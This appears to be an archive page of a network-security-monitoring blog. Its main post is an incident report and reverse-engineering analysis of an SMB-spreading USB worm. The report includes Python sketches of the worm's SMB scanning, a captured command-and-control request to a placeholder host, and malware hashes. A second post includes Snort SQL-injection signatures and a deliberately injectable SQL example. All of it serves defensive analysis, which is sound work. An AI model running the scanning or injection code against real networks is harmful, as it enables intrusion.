Archive for the NSM Category

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.
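
For illustration, here’s a rough Python sketch of the two “where am I?” lookups described above. The whatismyip.com automation URL is the one seen in the timeline; the UDP-socket trick for the inside local address is a common technique and only an assumption about how the malware obtained 192.168.1.11:

    import socket
    import urllib.request

    def outside_global_ip():
        # The same automation URL requested by Ian's machine; returns the
        # address the enterprise NATs us to, as seen from the Internet.
        url = "http://www.whatismyip.com/automation/n09230945.asp"
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode().strip()

    def inside_local_ip():
        # No packets are sent; connecting a UDP socket simply asks the OS
        # which local address would be used to reach the target.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
        finally:
            s.close()

    print("outside global:", outside_global_ip())
    print("inside local  :", inside_local_ip())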

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daiguo.com/?self

This is a geolocation site, and returns a string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.
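
For illustration, a Python sketch of the scanning pattern inferred from the flow data – start at host .1 of the /24 containing the outside global address and walk upwards, probing TCP 139 and 445. This shows the pattern an analyst should look for in session data; it is not the malware’s actual code:

    import ipaddress
    import socket

    def smb_scan_targets(outside_global, subnets=3):
        # Yields targets in the order observed: xxx.yyy.49.1 upwards, then
        # the .50 and .51 subnets as the day progresses.
        net = ipaddress.ip_network(f"{outside_global}/24", strict=False)
        for _ in range(subnets):
            for host in net.hosts():
                yield str(host)
            net = ipaddress.ip_network((int(net.network_address) + 256, 24))

    def smb_ports_open(host, timeout=0.5):
        open_ports = []
        for port in (139, 445):
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((host, port)) == 0:
                    open_ports.append(port)
        return open_ports

    # for target in smb_scan_targets("203.0.113.253"):
    #     print(target, smb_ports_open(target))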

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and physically disconnects the machine from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network) commences at this point.

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

08:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

09:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

09:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

09:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

09:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat, because it isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).
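
For illustration, a rough sketch of that manual check in Python: for each candidate host, enumerate its shares with the Windows “net view” command, take the first one (as the malware does) and look for gxcinr.exe in its root. The output parsing below is simplistic and is an assumption about the command’s layout:

    import os
    import subprocess

    def first_share(host):
        # "net view \\host" lists shares; Disk shares appear one per line
        # with the share name in the first column.
        out = subprocess.run(["net", "view", f"\\\\{host}"],
                             capture_output=True, text=True).stdout
        for line in out.splitlines():
            if line.strip().endswith("Disk") or " Disk " in line:
                return line.split()[0]
        return None

    def check_host(host, indicator="gxcinr.exe"):
        share = first_share(host)
        if share is None:
            return False
        return os.path.exists(f"\\\\{host}\\{share}\\{indicator}")

    # for host in ("192.168.1.5", "192.168.1.6"):
    #     print(host, check_host(host))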

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.
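
The details of $AV_VENDOR’s quarantine format are deliberately omitted here, but as an illustration of the general approach: several AV products store quarantined files XOR-ed with a fixed single-byte key plus a proprietary header, so recovery amounts to finding the key that brings back a recognisable PE image. A Python sketch under that assumption:

    import sys

    def xor_bytes(data, key):
        return bytes(b ^ key for b in data)

    def recover_executable(blob):
        # Try every single-byte key and look for the tell-tale PE strings.
        for key in range(256):
            decoded = xor_bytes(blob, key)
            offset = decoded.find(b"MZ")
            if offset != -1 and b"This program cannot be run" in decoded:
                return key, decoded[offset:]     # discard any vendor header
        return None, None

    if __name__ == "__main__":
        blob = open(sys.argv[1], "rb").read()
        key, exe = recover_executable(blob)
        if exe:
            open(sys.argv[1] + ".recovered", "wb").write(exe)
            print(f"recovered with XOR key 0x{key:02x}")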

On the $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3
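
Confirming that the recovered samples are identical is a simple matter of hashing each one; a quick Python sketch (file names are placeholders):

    import hashlib
    import sys

    def digests(path):
        h = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                for algo in h.values():
                    algo.update(chunk)
        return {name: algo.hexdigest() for name, algo in h.items()}

    if __name__ == "__main__":
        results = {path: digests(path) for path in sys.argv[1:]}
        for path, d in results.items():
            print(path, d["sha256"])
        print("all identical:", len({d["sha256"] for d in results.values()}) == 1)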

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it is not safe to judge the nature of malware from AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

We emailed the address above asking for help, but received no response.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary; the first four bytes are the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del "C:\gxcinr.exe"
    if exist "C:\gxcinr.exe" goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate Windows file called csrss.exe. Additionally, the file’s creation and modification times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact that this suspected C&C channel uses unencrypted HTTP, $URLFILTER only inspects nominated ports (port 80 is inspected by default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports, so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown whether this would have prevented the worm from spreading, but it would at least have been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.
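
For illustration, a Python sketch of a triage check for this removable-media propagation. It assumes the classic autorun.inf “open=”/“shellexecute=” technique; the exact contents of the autorun.inf written by this malware were not captured, so the parsing here is illustrative only:

    import configparser
    import os
    import string

    def suspicious_autorun(drive):
        inf = os.path.join(drive, "autorun.inf")
        if not os.path.exists(inf):
            return None
        cp = configparser.ConfigParser()
        try:
            cp.read(inf)
            for key in ("open", "shellexecute"):
                target = cp.get("autorun", key, fallback=None)
                if target and target.lower().endswith(".exe"):
                    return target
        except configparser.Error:
            return "unparseable autorun.inf"
        return None

    if __name__ == "__main__":
        for letter in string.ascii_uppercase:
            drive = f"{letter}:\\"
            if os.path.exists(drive):
                hit = suspicious_autorun(drive)
                if hit:
                    print(f"{drive} autorun.inf launches: {hit}")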

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DOS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively removing any limit on the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy had been applied, the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk


Rear echelon NSM

Posted in General Security, NSM on 20 April, 2010 by Alec Waters

When it comes to any kind of traffic analysis device, proper placement is of critical importance – if it’s in the wrong place on the network, it won’t be able to see what you hope it will, and you’ll be blind to any badness that it could potentially detect.

If you work for the kind of company that develops (and subsequently hosts or supports) interactive web applications for clients, having a sensor keep watch over your Internet-facing production servers is probably a good idea. However, how did all of your clients’ web application goodness get onto a production server in the first place? With a bit of luck, each application started its life on some kind of private development server, after which it moved onto a public user acceptance testing (UAT) server for the client to take a look at. Only after client sign-off would it have moved to the production server.

I think that it’s a good idea to place sensors to watch over the seemingly less-important development and UAT servers, too. Let’s take each in turn:

Development Servers

Dev boxes are usually well within an organisation’s perimeter, behind firewalls and the like. Why would anyone try to take hostile action against a dev server? Surely if an attacker was even in a position to do so, you’d have far greater problems than attacks on the dev server – you’d have an attacker roaming at will within the castle walls. So what’s the point?

Well, here’s an example. Let’s say your sensor is loaded up with a whole bunch of signatures that attempt to detect various classes of web attack (SQL Injection, XSS, etc.), and you’ve got developers who just love technologies like AJAX and JSON. It’s terribly useful to have an AJAX request return some JSON-formatted data, a bit like the example here (seems to work OK in IE and FireFox). Type the letter A into the first textbox, and an AJAX request is made to the server which returns a JSON-formatted resultset of people whose names begin with A (fire up Wireshark and take a look at the requests for /specials/ajax_autosuggest/test.php). This resultset can then be parsed by the browser, and the data processed in whatever manner is necessary. Powerful stuff!

There’s nothing wrong with the example on the page above, but AJAX can go pear-shaped if a developer is tempted to embed raw SQL statements into the request (or even partial statements like ‘where’ clauses). AJAX requests are under-the-bonnet affairs that don’t appear in the browser’s Location bar, so it’s easy to think that they are out of sight and out of mind, when they can often be run directly and outside of their intended context. Any attacker worth their salt will discover and leverage a vulnerable AJAX page, and if there’s raw SQL in it, it’s bad news for the application concerned – you’re offering them the chance to execute arbitrary SQL against your server.
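
As a contrived sketch of that anti-pattern (sqlite3 standing in for the real database, all names made up), compare an AJAX handler that appends a client-supplied ‘where’ clause to its SQL with a properly parameterised one:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE people (name TEXT, salary INTEGER)")
    conn.execute("INSERT INTO people VALUES ('Alice', 50000), ('Bob', 40000)")

    def autosuggest_bad(where_clause):
        # Whatever the AJAX request hands us goes straight into the query -
        # exactly the sort of thing the signatures below are meant to catch.
        return conn.execute(f"SELECT name FROM people WHERE {where_clause}").fetchall()

    def autosuggest_good(prefix):
        # Parameterised version: the client supplies data, never SQL.
        return conn.execute("SELECT name FROM people WHERE name LIKE ? || '%'",
                            (prefix,)).fetchall()

    print(autosuggest_bad("name LIKE 'A%'"))                       # intended use
    print(autosuggest_bad("1=1 UNION SELECT salary FROM people"))  # attacker's use
    print(autosuggest_good("A"))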

So how can NSM help? With a bit of luck, our sensor has signatures like the ones below that stand a chance of picking up raw SQL elements in AJAX requests:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql insert injection attempt - GET parameter"; flow:established,to_server; uricontent:"insert"; nocase; pcre:"/insert\s+into\s+[^\/\\]+/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13513; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql exec injection attempt - GET parameter"; flow:established,to_server; uricontent:"exec"; nocase; pcre:"/exec\s+master/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13512; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql update injection attempt - GET parameter"; flow:established,to_server; uricontent:"update"; nocase; pcre:"/update\s+[^\/\\]+set\s+[^\/\\]+/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13514; rev:7;)

etc…

If signatures like these start firing whilst a new application is under development (and not under attack), it’s time to talk to the developers. Better to nip a vulnerability like this in the bud pre-deployment than to rush out an emergency hotfix post-breach. Even if the SQL isn’t exploitable (can you prove it?), you’re still giving too much away in the form of table and column names.

As an added bonus, an NSM sensor with full-packet capture capability can be used as a handy debugging aid when an obscure browser doesn’t work as expected – there ain’t no substitute for the actual HTTP transaction at times like these!

UAT Servers

These boxes are often sitting on the Internet proper so that the client can come along and review and test pre-release versions of the application. By definition, these are test servers, and may therefore have bugs and vulnerabilities that will hopefully be ironed out during the testing cycle; error reporting may also be turned up to the most verbose level to help the process. There may also be other code present for other projects, or experimental code left by someone wanting to test a theory, or all manner of other flotsam and jetsam.

All of this is advantageous to an attacker, and may eventually allow them access to the server. UAT boxes sometimes need to have “real” customer data on them for realistic testing, which makes them just as high-value a target as the production box. What if the UAT server is also a staging area for deployment? What if an attacker could add their own backdoor code into the staging area, ready for deployment later on?

Dismissing the need to monitor development and UAT servers because “they’re not live machines” sounds like a recipe for trouble to me. You need to protect your assets at all stages of their lifecycle, from the initial brainstorming to the great fdisk in the sky!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

(Mis)reading the runes

Posted in General Security, NSM on 16 February, 2010 by Alec Waters

Richard’s post over here talks about the “Intruder’s Dilemma”:

The defender only needs to detect one of the indicators of the intruder’s presence in order to initiate incident response within the enterprise.

I agree wholeheartedly. However, the wonderful thing about Indicators is that there can be lots and lots of them, and interpreting them can be tricky. Sometimes it’s easy to misinterpret what they’re telling you, and sometimes it’s tempting to focus 100% on the first or most prominent Indicator observed, ignoring (or not looking for) other ones that will add context and detail to the overall situation.

Take for example the Indicator in the picture below. What are we looking at?

  1. An enclosure at a wildlife park, or
  2. Some kind of strip club?

I was pretty disappointed when I went in, because:

  • For some reason, I had chosen to focus on my first interpretation of the Indicator, and
  • I had failed to take into account any unfavourable counter-Indicators that contradicted my assessment (the most prominent of which was being at a zoo at the time)

A while back, we had a problem with one of our systems – ProcessA wasn’t able to talk to ProcessB (the “security” slant here is that we’re dealing with a compromise of the “availability” facet of the CIA Triad). The system wasn’t working, and ProcessA had left loads of Indicators in the form of log entries which said “I tried to talk to ProcessB on port 1234 but I couldn’t”. ProcessA was clearly working at this point (otherwise there would have been no log entries), so the initial interpretation of the Indicator was that ProcessB was in some way at fault.

Cue the usual troubleshooting process:

  • Is ProcessB running? Yes.
  • Is ProcessB accepting requests right now? Yes, it seems to be working. The error messages from ProcessA are intermittent.
  • Was ProcessB running at the time ProcessA logged the messages? Yes. ProcessB logs startup/shutdown messages, and there aren’t any for this particular timeframe.
  • Was there some kind of network problem? Unlikely, since ProcessA and ProcessB are running on the same server.
  • Are you sure it wasn’t the network? Given the above, the network really can’t have much of a hand in this!
  • But ProcessB listens on IP address 1.2.3.4, which is bound to a physical interface. If that interface went down, wouldn’t ProcessB’s ability to listen be affected? Yes, but logs from the switch that the server connects to don’t show any up/down events for the interface concerned.

And so it went on, for several hours. ProcessB was deemed to be at fault, yet we couldn’t find anything wrong with it. The troubleshooting had become bogged down because:

  1. We were proceeding under the assumption that ProcessB was broken (I mean, duh!! ProcessA wouldn’t have left all those log messages if ProcessB were working, would it?!?)
  2. We were ignoring a gigantic counter-Indicator, namely “there’s nothing wrong with ProcessB”.

It generally takes two to tango, something that applies as much to TCP comms as anything else. If the server’s not at fault, perhaps it’s the client, ProcessA?

As it turns out, ProcessA was indeed the one with the problem. An errant service, ProcessZ, had been leaving thousands of sockets in the CLOSE_WAIT state (this almost always indicates a problem with the software, rather than an expected TCP phenomenon). Eventually, it got to the point where the tango-ing ProcessA needed a client socket to talk to ProcessB, but there weren’t any ephemeral ports available because ProcessZ had, over time, left them all in CLOSE_WAIT (Windows Server 2003 only allows for 5000 ephemeral ports by default). Lacking a client socket with which to talk to ProcessB, ProcessA therefore duly logs a message to say that “I tried to talk to ProcessB on port 1234 but I couldn’t”…
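
A quick way to spot this failure mode is to count CLOSE_WAIT sockets per owning process; a few thousand belonging to one PID is a strong hint about who the real culprit is, whatever the other process’s logs say. A Python sketch using Windows’ “netstat -ano” (the output parsing is simplistic):

    import subprocess
    from collections import Counter

    def close_wait_by_pid():
        out = subprocess.run(["netstat", "-ano", "-p", "tcp"],
                             capture_output=True, text=True).stdout
        counts = Counter()
        for line in out.splitlines():
            fields = line.split()
            # Expected columns: Proto, Local Address, Foreign Address, State, PID
            if len(fields) == 5 and fields[3].upper() == "CLOSE_WAIT":
                counts[fields[4]] += 1
        return counts

    if __name__ == "__main__":
        for pid, n in close_wait_by_pid().most_common(10):
            print(f"PID {pid}: {n} sockets in CLOSE_WAIT")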

Restarting ProcessZ was a temporary band-aid – all the sockets in CLOSE_WAIT went away, and ProcessA danced the night away with ProcessB.

The moral of the story? Don’t take isolated Indicators at face value. There will almost always be other Indicators that either back up or refute your assessment – all you have to do is look for them.

The other moral of the story? Very few zoos have strip clubs 🙂


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Making sense of the results of the net-entropy experiment

Posted in Crazy Plans, net-entropy, NSM on 19 January, 2010 by Alec Waters

